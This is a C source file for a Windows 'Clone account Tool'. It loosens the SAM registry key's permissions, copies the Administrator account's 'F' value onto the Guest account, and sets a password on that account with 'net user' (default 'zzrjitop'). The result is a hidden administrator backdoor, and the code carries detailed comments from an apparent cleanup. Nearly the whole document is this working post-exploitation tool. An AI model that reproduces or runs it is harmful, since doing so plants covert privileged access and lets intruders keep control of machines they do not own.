c语言简单实现克隆帐户
#include <Windows.h>
#include <Aclapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#pragma comment (lib,\"Advapi32.lib\")
#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383
DWORD user_flag = 0;        /* set to 1 by QueryKey() once an account whose RID is 0x1F5 has been found */
TCHAR cloneUser[1024];      /* name of that account; written by QueryKey(), read by main() for the "net user" calls */
void QueryKey(HKEY hKey);   /* enumerate the subkeys of ...\Users\Names (hKey) looking for RID 0x1F5 */
void banner();              /* print the tool banner and usage line */
/*
 * Switch the console text attribute used for everything printed afterwards.
 * `color` is the raw attribute value passed to SetConsoleTextAttribute;
 * this file uses 7 (default), 10 (green), 12 (red), 14 (yellow) and 0
 * (black on black, to hide net.exe output). Return values are not checked.
 */
void text_color(WORD color)
{
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), color);
}
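/* Size, in TCHARs, of the command-line buffers handed to the shell
 * (the original listing used fixed 1024-TCHAR arrays). */
#define CMD_BUF_LEN 1024

/* Password applied when none is supplied on the command line. */
#define DEFAULT_CLONE_PASSWORD _T("zzrjitop")

/*
 * Print "<what> Error: <err>" followed by a red "[Fail]" in the colour
 * scheme used throughout this file (7 = default, 12 = red).
 */
static void report_failure(LPCTSTR what, DWORD err)
{
    text_color(7);
    _tprintf(_T("%s Error: %lu"), what, (unsigned long)err);
    text_color(12);
    _tprintf(_T("[Fail]\n"));
    text_color(7);
}

/* Print a progress line followed by a green "[OK]". */
static void report_ok(LPCTSTR what)
{
    text_color(7);
    _tprintf(_T("%s"), what);
    text_color(10);
    _tprintf(_T("[OK]\n"));
    text_color(7);
}

/* Print a step failure in the original's two-line style ("...\n" then red "Fail"). */
static void report_step_failure(LPCTSTR what)
{
    text_color(7);
    _tprintf(_T("%s\n"), what);
    text_color(12);
    _tprintf(_T("\nFail\n"));
    text_color(7);
}

/*
 * Decide whether a password can be spliced verbatim into
 * "net user <name> <password>" and run through system(), i.e. cmd.exe.
 * Whitespace would split the argument, quotes and cmd.exe metacharacters
 * (& | < > ^ % ( ) !) would be interpreted by the shell, and a leading
 * '/' would be read by net.exe as a switch. Returns nonzero when the
 * password contains none of these and is non-empty.
 */
static int password_is_shell_safe(LPCTSTR pw)
{
    static const TCHAR forbidden[] = _T(" \t\"&|<>^%()!\r\n");
    size_t i;

    if (pw == NULL || pw[0] == _T('\0') || pw[0] == _T('/'))
        return 0;
    for (i = 0; pw[i] != _T('\0'); i++) {
        if (_tcschr(forbidden, pw[i]) != NULL)
            return 0;
    }
    return 1;
}

/*
 * Build "net user <user> <arg>" into cmd (CMD_BUF_LEN TCHARs).
 * Returns 0 on success, -1 when the pieces would not fit; nothing is
 * written in that case. The original appended argv[1] with _tcscat and
 * no bound, which overflowed the stack buffer on a long argument.
 */
static int build_net_user_cmd(LPTSTR cmd, LPCTSTR user, LPCTSTR arg)
{
    static const TCHAR prefix[] = _T("net user ");
    size_t need = (sizeof prefix / sizeof prefix[0]) - 1   /* prefix */
                + _tcslen(user) + 1                        /* user + ' ' */
                + _tcslen(arg) + 1;                        /* arg + NUL */

    if (need > CMD_BUF_LEN)
        return -1;
    _tcscpy(cmd, prefix);
    _tcscat(cmd, user);
    _tcscat(cmd, _T(" "));
    _tcscat(cmd, arg);
    return 0;
}

/*
 * Run one "net user <user> <arg>" command through the shell. As in the
 * original, the console colour is set to 0 first so net.exe's own output
 * is not visible; it is reset to 7 afterwards. Returns the shell's exit
 * status (0 on success) or -1 if the command line could not be built.
 * NOTE: `arg` must already have passed password_is_shell_safe() (or be a
 * fixed literal); this still goes through cmd.exe.
 */
static int run_net_user(LPCTSTR user, LPCTSTR arg)
{
    TCHAR cmd[CMD_BUF_LEN];
    int rc;

    if (build_net_user_cmd(cmd, user, arg) != 0)
        return -1;
    text_color(0);
    rc = _tsystem(cmd);
    text_color(7);
    return rc;
}

/*
 * Entry point. Usage: clone.exe [password]
 *
 * Steps, in order:
 *   1. Read the DACL of HKLM\SAM\SAM and apply a copy with an inheritable
 *      Everyone:KEY_ALL_ACCESS ACE added, so the SAM subkeys can be
 *      opened from this process.
 *   2. Find the account whose RID is 0x1F5 under ...\Users\Names
 *      (QueryKey fills the globals cloneUser / user_flag).
 *   3. Copy the binary "F" value of ...\Users\000001F4 over the "F"
 *      value of ...\Users\000001F5.
 *   4. Run "net user <name> <password>" and "net user <name> /active:no"
 *      through cmd.exe, then print the name and password.
 *   5. Restore the saved DACL and release every handle and allocation.
 *
 * Differences from the original listing: argv[1] was appended to a fixed
 * 1024-TCHAR buffer with no length check and passed to cmd.exe
 * unfiltered (stack overflow / command injection) - both are now
 * rejected before anything is modified; exit() on several error paths
 * skipped step 5, leaving HKLM\SAM\SAM writable by Everyone - every
 * failure now reaches FreeAndExit and a failed restore is reported;
 * the size and type of "F" are queried rather than assumed to fit in
 * 2048 bytes; keys are opened with only the rights each step needs;
 * failures return a nonzero exit status (5 after a net.exe failure, as
 * before; 1 otherwise).
 *
 * Assumptions inherited from the original: an ANSI (non-UNICODE) build,
 * since argv is char** and is mixed with TCHAR APIs; the caller is
 * allowed to change the DACL of HKLM\SAM\SAM (on a default install that
 * is Administrators via WRITE_DAC - confirm on the target OS); RID 0x1F5
 * is Guest on a default install (the account name is not checked).
 * The password is visible on the net.exe command line to anything that
 * can list processes, and the DACL change, the value write and the two
 * net.exe launches can all be recorded if object-access and
 * process-creation auditing are enabled on the host.
 */
int main(int argc, char **argv)
{
    DWORD dwRet;
    LPTSTR SamName = _T("MACHINE\\SAM\\SAM");
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pOldDacl = NULL;       /* points into pSD; put back at FreeAndExit */
    PACL pNewDacl = NULL;       /* old DACL + Everyone ACE, from SetEntriesInAcl */
    EXPLICIT_ACCESS ea;
    HKEY hKey = NULL;           /* ...\Users\000001F4, source of "F" */
    HKEY cKey = NULL;           /* ...\Users\000001F5, target of "F" */
    HKEY uKey = NULL;           /* ...\Users\Names, enumerated by QueryKey */
    LPBYTE lpDataF = NULL;      /* copy of the source "F" value */
    DWORD Type = REG_NONE;
    DWORD SizeF = 0;
    LPCTSTR password;
    int dacl_changed = 0;       /* nonzero once the modified DACL is in place */
    int exit_code = 1;          /* 0 only when every step succeeded */

    banner();

    /* Validate the command line before touching the SAM at all. */
    if (argc > 2) {
        text_color(12);
        _tprintf(_T("Usage: clone.exe [password]\n"));
        text_color(7);
        return 1;
    }
    password = (argc == 2) ? argv[1] : DEFAULT_CLONE_PASSWORD;
    if (!password_is_shell_safe(password)) {
        text_color(12);
        _tprintf(_T("Refusing password: it is empty, starts with '/', or contains whitespace, quotes or cmd.exe metacharacters and would be mis-parsed or executed by system()\n"));
        text_color(7);
        return 1;
    }

    /* 1. Snapshot the current DACL of HKLM\SAM\SAM so it can be restored. */
    dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, &pOldDacl, NULL, &pSD);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (1)"), dwRet);
        goto FreeAndExit;
    }

    /* 2. Merge an inheritable Everyone:KEY_ALL_ACCESS ACE into it and apply. */
    ZeroMemory(&ea, sizeof ea);
    BuildExplicitAccessWithName(&ea, _T("Everyone"), KEY_ALL_ACCESS, SET_ACCESS,
                                SUB_CONTAINERS_AND_OBJECTS_INHERIT);
    dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (2)"), dwRet);
        goto FreeAndExit;
    }
    dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, pNewDacl, NULL);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("Set Privilege (3)"), dwRet);
        goto FreeAndExit;
    }
    dacl_changed = 1;
    report_ok(_T("[+]Set Privilege.."));

    /* 3. Locate the RID-0x1F5 account; KEY_READ covers RegQueryInfoKey and RegEnumKeyEx. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\Names"),
                         0, KEY_READ, &uKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto FreeAndExit;
    }
    QueryKey(uKey);
    if (user_flag == 0) {
        text_color(12);
        _tprintf(_T("The guest user may be delete!\n"));
        text_color(7);
        goto FreeAndExit;
    }

    /* 4. Read the source "F" value, sizing the buffer from the registry. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4"),
                         0, KEY_QUERY_VALUE, &hKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto FreeAndExit;
    }
    dwRet = RegQueryValueEx(hKey, _T("F"), NULL, &Type, NULL, &SizeF);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegQueryValueEx"), dwRet);
        goto FreeAndExit;
    }
    if (Type != REG_BINARY || SizeF == 0) {
        text_color(12);
        _tprintf(_T("Unexpected \"F\" value: type %lu, %lu bytes\n"),
                 (unsigned long)Type, (unsigned long)SizeF);
        text_color(7);
        goto FreeAndExit;
    }
    lpDataF = (LPBYTE)malloc(SizeF);
    if (lpDataF == NULL) {
        report_step_failure(_T("Out of memory.."));
        goto FreeAndExit;
    }
    dwRet = RegQueryValueEx(hKey, _T("F"), NULL, &Type, lpDataF, &SizeF);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegQueryValueEx"), dwRet);
        goto FreeAndExit;
    }

    /* 5. Overwrite the target "F" value; only KEY_SET_VALUE is needed. */
    dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\\SAM\\Domains\\Account\\Users\\000001F5"),
                         0, KEY_SET_VALUE, &cKey);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegOpenKeyEx"), dwRet);
        goto FreeAndExit;
    }
    dwRet = RegSetValueEx(cKey, _T("F"), 0, REG_BINARY, lpDataF, SizeF);
    if (dwRet != ERROR_SUCCESS) {
        report_failure(_T("RegSetValueEx"), dwRet);
        goto FreeAndExit;
    }
    report_ok(_T("[+]Clone Successfully.."));
    report_ok(_T("[+]Try to set user password.."));

    /* 6. Set the password, then disable the account, via net.exe. */
    if (run_net_user(cloneUser, password) != 0) {
        report_step_failure(_T("Set password fail.."));
        exit_code = 5;
        goto FreeAndExit;
    }
    if (run_net_user(cloneUser, _T("/active:no")) != 0) {
        report_step_failure(_T("Disable account fail.."));
        exit_code = 5;
        goto FreeAndExit;
    }

    text_color(14);
    _tprintf(_T("[+]User: %s Password: %s\n"), cloneUser, password);
    text_color(7);
    exit_code = 0;

FreeAndExit:
    if (hKey) RegCloseKey(hKey);
    if (cKey) RegCloseKey(cKey);
    if (uKey) RegCloseKey(uKey);
    free(lpDataF);
    if (pNewDacl) LocalFree(pNewDacl);
    /* Put the original DACL back. pOldDacl lives inside pSD, so this must
     * happen before pSD is freed. A failure here is the worst outcome of
     * this tool - HKLM\SAM\SAM stays open to Everyone - so say so loudly. */
    if (dacl_changed && pOldDacl) {
        dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                     NULL, NULL, pOldDacl, NULL);
        if (dwRet != ERROR_SUCCESS) {
            text_color(12);
            _tprintf(_T("WARNING: could not restore the SAM DACL (error %lu); HKLM\\SAM\\SAM is still granting Everyone full control\n"),
                     (unsigned long)dwRet);
            text_color(7);
            if (exit_code == 0)
                exit_code = 1;
        }
    }
    if (pSD) LocalFree(pSD);
    return exit_code;
}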
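/*
 * Find the account whose RID is 0x1F5 by enumerating the subkeys of
 * HKLM\SAM\SAM\Domains\Account\Users\Names (hKey must be open on that key
 * with at least KEY_READ). Each subkey is named after an account and its
 * default (unnamed) value carries the account's RID in the value's *type*
 * field, which is why `type` is compared rather than any data.
 *
 * On a match: copies the subkey name into the global cloneUser, sets
 * user_flag = 1 and returns. Otherwise user_flag stays 0. Errors are
 * printed and the function returns instead of calling exit(), so that the
 * caller's cleanup (which restores the SAM DACL) still runs.
 *
 * Changes from the original: the per-iteration 2 KiB buffer that was
 * never freed and the tKey handle that was never closed are gone (only
 * the type is requested, so no data buffer is needed and the stale
 * `Size` that was not reset between iterations cannot cause
 * ERROR_MORE_DATA); subkeys are opened with KEY_QUERY_VALUE instead of
 * KEY_ALL_ACCESS; a RegQueryInfoKey failure is reported rather than
 * silently producing an empty enumeration.
 */
void QueryKey(HKEY hKey)
{
    static const TCHAR fulPath[] = _T("SAM\\SAM\\Domains\\Account\\Users\\Names\\");
    TCHAR achKey[MAX_KEY_LENGTH];       /* subkey (account) name */
    TCHAR temp[MAX_VALUE_NAME];         /* fulPath + achKey; always fits (39 + 255 chars) */
    DWORD cSubKeys = 0;
    DWORD i, retCode;

    ZeroMemory(cloneUser, sizeof cloneUser);
    user_flag = 0;

    /* Only the subkey count is needed; every other out-parameter may be NULL. */
    retCode = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys,
                              NULL, NULL, NULL, NULL, NULL, NULL, NULL);
    if (retCode != ERROR_SUCCESS) {
        text_color(7);
        _tprintf(_T("RegQueryInfoKey Error: %lu"), (unsigned long)retCode);
        text_color(12);
        _tprintf(_T("[Fail]\n"));
        text_color(7);
        return;
    }

    for (i = 0; i < cSubKeys; i++) {
        DWORD cbName = MAX_KEY_LENGTH;
        DWORD type = REG_NONE;
        HKEY tKey = NULL;

        retCode = RegEnumKeyEx(hKey, i, achKey, &cbName, NULL, NULL, NULL, NULL);
        if (retCode != ERROR_SUCCESS)
            continue;   /* as in the original: skip entries that cannot be enumerated */

        _tcscpy(temp, fulPath);
        _tcscat(temp, achKey);

        retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_QUERY_VALUE, &tKey);
        if (retCode != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegOpenKeyEx Error: %lu"), (unsigned long)retCode);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        /* NULL data/size pointers ask for the type only. */
        retCode = RegQueryValueEx(tKey, NULL, NULL, &type, NULL, NULL);
        RegCloseKey(tKey);
        if (retCode != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegQueryValueEx Error: %lu"), (unsigned long)retCode);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        if (type == 0x1f5) {
            text_color(7);
            _tprintf(_T("[+]Starting clone %s.."), achKey);
            text_color(10);
            _tprintf(_T("[OK]\n"));
            text_color(7);
            _tcscpy(cloneUser, achKey);
            user_flag = 1;
            return;
        }
    }
}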
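/*
 * Print the tool banner: name, what it clones, usage and author credit.
 * The listing had lost the backslash of every "\n" escape (lines ended in
 * a literal 'n'); the newlines are restored here.
 */
void banner(void)
{
    _tprintf(_T("******************************************************\n"));
    _tprintf(_T("* Clone account Tool\n"));
    _tprintf(_T("* Clone the 1F5 user\n"));
    _tprintf(_T("* Usage: clone.exe or clone.exe pass\n"));
    _tprintf(_T("*"));
    text_color(12);
    _tprintf(_T(" If clone successfully it was made by zz[E.S.t]\n"));
    text_color(7);
    _tprintf(_T("******************************************************\n\n"));
}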